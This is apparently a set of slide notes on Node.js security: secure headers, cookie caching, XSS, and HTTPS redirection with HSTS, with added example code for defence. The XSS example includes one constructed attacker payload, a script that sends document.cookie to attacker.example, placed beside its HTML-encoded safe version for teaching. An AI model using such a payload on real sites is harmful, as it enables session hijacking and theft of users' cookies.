The document discusses security best practices for Node.js applications. It covers using Helmet to set secure HTTP headers, signing session cookies with cookie-session, mitigating CSRF with csurf, validating and sanitizing user input with express-validator, and hashing passwords with bcrypt. It also covers building an HTTPS-only server (redirecting plaintext traffic and sending HSTS), auditing dependencies for known vulnerabilities with tools such as NSP (the Node Security Project) and Snyk, and practising on OWASP NodeGoat, a deliberately vulnerable Node.js application built for security testing.
3. Node.js introduction
JavaScript on the backend
Built on Chrome's JavaScript runtime (V8)
Node.js is built around an event loop
Designed to be asynchronous (non-blocking I/O)
Single-threaded JavaScript execution
Handles many concurrent requests without a thread per connection
21. Keep cookies out of the browser and proxy cache
var express = require('express');
var app = express();

// Field-specific Cache-Control: a cache must revalidate before reusing the named headers,
// so a cached response cannot hand one user's Set-Cookie to another. Many caches treat this
// form as a plain no-cache; Set-Cookie2 is obsolete (RFC 6265) and is listed only for legacy caches.
app.use(function (req, res, next) {
  res.header('Cache-Control', 'no-cache="Set-Cookie, Set-Cookie2"');
  next();
});
22. XSS attacks
An attacker can exploit an XSS vulnerability to:
Steal session cookies / hijack the session
Redirect users to malicious sites
Deface the page and manipulate its content
Mount cross-site request forgery from within the victim's authenticated session
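The root cause behind all four consequences above is untrusted data written into HTML without encoding. The following is an added example, not code from the slides: the same greeting page rendered vulnerably and then with output encoding for the HTML text context. The helper names (escapeHtml, renderVulnerable, renderSafe, containsScriptTag) and the attacker payload are constructed for this illustration.

```javascript
// Added example (not from the original slides): one page rendered with and
// without output encoding. All helper names here are hypothetical.

// Encode the five characters that let data break out of an HTML text node
// or a double-quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the user-controlled "name" is concatenated straight into markup.
function renderVulnerable(name) {
  return '<h1>Hello, ' + name + '</h1>';
}

// Hardened: every untrusted value is encoded for the HTML context it lands in.
// (Attribute, URL and JavaScript contexts each need their own encoder; this
// one is only correct for text nodes and double-quoted attributes.)
function renderSafe(name) {
  return '<h1>Hello, ' + escapeHtml(name) + '</h1>';
}

// Constructed attacker input: a script that ships document.cookie off-site,
// the "steal session cookies" case from the list above.
const payload =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Crude check used only to make the difference visible: does the markup
// still contain an attacker-controlled script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable:', renderVulnerable(payload));
console.log('safe:      ', renderSafe(payload));
```

Encoding at output time, in the context where the data is written, is what a template engine with auto-escaping does for you; input "sanitization" alone does not cover data that reaches the page through other paths (database, headers, third-party APIs).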
38. Building a secure HTTPS server
https://www.npmjs.com/package/https-redirect-server
https://www.npmjs.com/package/express-enforces-ssl
Redirect all plaintext HTTP traffic to HTTPS on the secure port (either of the packages above does this as Express middleware)
40. Building a secure HTTPS server
var express = require('express');
var helmet = require('helmet');
var app = express();

// HSTS: tell browsers to use HTTPS only for this host (and its subdomains) for one year.
// Current helmet takes maxAge in seconds; older helmet releases took milliseconds,
// which is why the original slide computed it with ms("1 year").
app.use(helmet.hsts({
  maxAge: 31536000,
  includeSubDomains: true
}));
Sends the Strict-Transport-Security header on every response; browsers only honour it when it arrives over HTTPS, so the redirect from the previous slide must be in place first.
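The two slides above (redirect to HTTPS, then send HSTS) are one procedure. The following is an added example, not the slides' code and not the implementation of https-redirect-server, express-enforces-ssl or helmet: both steps written as middleware in Express's (req, res, next) shape, so the decisions the packages make for you are visible. The TRUST_PROXY flag, the fake request/response objects and the hostnames are assumptions made for this illustration.

```javascript
// Added example (not from the slides or from the packages named above):
// HTTPS enforcement plus HSTS as plain (req, res, next) middleware.
// TRUST_PROXY, fakeReq and fakeRes are hypothetical, constructed for this demo.

const ONE_YEAR_SECONDS = 365 * 24 * 60 * 60; // 31536000

// Only trust X-Forwarded-Proto when a TLS-terminating proxy you control sets it;
// otherwise any client can claim "https" and bypass the redirect.
const TRUST_PROXY = true;

function isSecure(req) {
  if (req.secure) return true; // Express sets this for direct TLS connections
  if (!TRUST_PROXY) return false;
  const proto = (req.headers['x-forwarded-proto'] || '').split(',')[0].trim();
  return proto.toLowerCase() === 'https';
}

// Redirect plaintext GET/HEAD to the same URL on HTTPS with a permanent 301.
// Other methods are refused: the body already crossed the wire in clear text,
// and a 301 would silently turn a POST into a GET anyway.
function enforceHttps(req, res, next) {
  if (isSecure(req)) return next();
  if (req.method !== 'GET' && req.method !== 'HEAD') {
    res.statusCode = 403;
    res.end('Use HTTPS');
    return;
  }
  res.statusCode = 301;
  res.setHeader('Location', 'https://' + req.headers.host + req.url);
  res.end();
}

// Send HSTS only on HTTPS responses; browsers ignore it over plain HTTP.
function hsts(req, res, next) {
  if (isSecure(req)) {
    res.setHeader('Strict-Transport-Security',
      'max-age=' + ONE_YEAR_SECONDS + '; includeSubDomains');
  }
  next();
}

// Minimal stand-ins for Express request/response objects (constructed).
function fakeReq({ method = 'GET', url = '/', host = 'example.test',
                   secure = false, forwardedProto } = {}) {
  const headers = { host };
  if (forwardedProto) headers['x-forwarded-proto'] = forwardedProto;
  return { method, url, headers, secure };
}

function fakeRes() {
  const res = { statusCode: 200, headers: {}, ended: false };
  res.setHeader = (k, v) => { res.headers[k.toLowerCase()] = v; };
  res.end = () => { res.ended = true; };
  return res;
}

// Run both middlewares in order and report what the client would observe.
function handle(req) {
  const res = fakeRes();
  let reachedApp = false;
  enforceHttps(req, res, () => hsts(req, res, () => { reachedApp = true; }));
  return { status: res.statusCode, headers: res.headers, reachedApp };
}

console.log(handle(fakeReq({ url: '/login' })));                          // 301 to https://
console.log(handle(fakeReq({ url: '/login', forwardedProto: 'https' }))); // 200 + HSTS
```

With real Express the equivalent of TRUST_PROXY is app.set('trust proxy', ...), which makes req.secure reflect X-Forwarded-Proto; leave it off when the app terminates TLS itself, because then the header is attacker-controlled.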